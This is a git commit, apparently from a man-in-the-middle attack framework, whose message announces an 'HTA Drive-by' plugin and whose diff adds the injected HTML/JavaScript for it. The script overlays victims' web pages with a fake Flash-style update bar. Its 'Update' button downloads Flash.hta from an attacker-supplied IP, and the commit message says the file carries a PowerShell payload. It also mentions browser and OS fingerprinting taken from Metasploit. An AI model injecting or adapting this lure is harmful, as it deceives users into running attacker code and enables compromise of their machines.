This is a vewwwy big commit

- The inject plugin now uses beautifulsoup4 to actually parse HTML and add content to it as supposed to using regexes - The logging of the whole framework has been compleatly overhauled - plugindetect.js now includes os.js from the metasploit framework for os and browser detection, let's us fingerprint hosts even if UA is lying! - New plugin HTA Drive-by has been added, prompts the user for a plugin update and makes them download an hta app which contains a powershell payload - the API of the plugins has been simplified - Improvements and error handling to user-agent parsing - Some misc bugfixes
2025-07-16 10:03:52 -07:00 · 2015-07-18 20:14:07 +02:00 · 2015-07-18 20:14:07 +02:00 · 5e2f30fb89
commit 5e2f30fb89
parent ff0ada2a39
64 changed files with 3748 additions and 1473 deletions
--- a/core/html/htadriveby.html
+++ b/core/html/htadriveby.html
@ -0,0 +1,71 @@
+<script>
+var newHTML = document.createElement('div');
+
+newHTML.innerHTML = '        \
+<style type="text/css">   \
+     \
+  #headerupdate {   \
+  display:none;    \
+  position: fixed !important;    \
+  top: 0 !important;    \
+  left: 0 !important;    \
+  z-index: 2000 !important;    \
+  width: 100% !important;    \
+  height: 40px !important;   \
+    overflow: hidden !important;   \
+    font-size: 14px !important;    \
+  color: black !important;     \
+    font-weight: normal !important;    \
+    background-color:#F0F0F0 !important;    \
+    border-bottom: 1px solid #A0A0A0 !important;    \
+       \
+  }   \
+     \
+  #headerupdate h1 {   \
+    float: left !important;   \
+    margin-left: 2px !important;   \
+  margin-top: 14px !important;     \
+    padding-left: 30px !important;   \
+    font-weight:normal !important;   \
+    font-size: 13px !important;   \
+       \
+    background:url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABsAAAAOCAYAAADez2d9AAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsIAAA7CARUoSoAAAACnSURBVDhP5ZRNCgMhDIWj6ELwFt7JE3gkT+GRPIVLwZ8Wpy4KNXFm6KLQDx4qgbwkoiyl9AAE7z0opUBrDaUUyDmDc24bw+BzXVJrnbsX72cqhkF2FmMEKSUIIaD3fiQ0xmxjGKhZCOFIcgXOOVhr5+kTdIyj0mF2RbtRomattVuiQM1WlZ8RxW90tkp0RhR/aLa6/DOiQM0YY8tklMajpiC/q+8C8AS167V3qBALWwAAAABJRU5ErkJggg==") no-repeat left top !important;   \
+  }   \
+     \
+  #headerupdate ul {   \
+    padding: 0 !important;   \
+    text-align: right !important;   \
+  }   \
+     \
+  #headerupdate li {   \
+    display: inline-block !important;   \
+    margin: 0px 15px !important;   \
+    text-align: left !important;   \
+  }   \
+     \
+</style>   \
+<div id="headerupdate">   \
+  <h1>   \
+    <strong>   \
+    _TEXT_GOES_HERE_   \
+    </strong>   \
+  </h1>   \
+     \
+  <ul>   \
+       \
+    <li>   \
+      <a target="_blank" href="http://_IP_GOES_HERE_/Flash.hta">   \
+        <button type="button" style="font-size: 100%; margin-top: 5px; padding: 2px 5px 2px 5px; color: black;">   \
+          Update   \
+        </button>   \
+           \
+      </a>   \
+    </li>   \
+  </ul>   \
+</div>   \
+';
+
+ document.body.appendChild(newHTML);
+ document.getElementById("headerupdate").style.display = "block";
+ 
+ </script>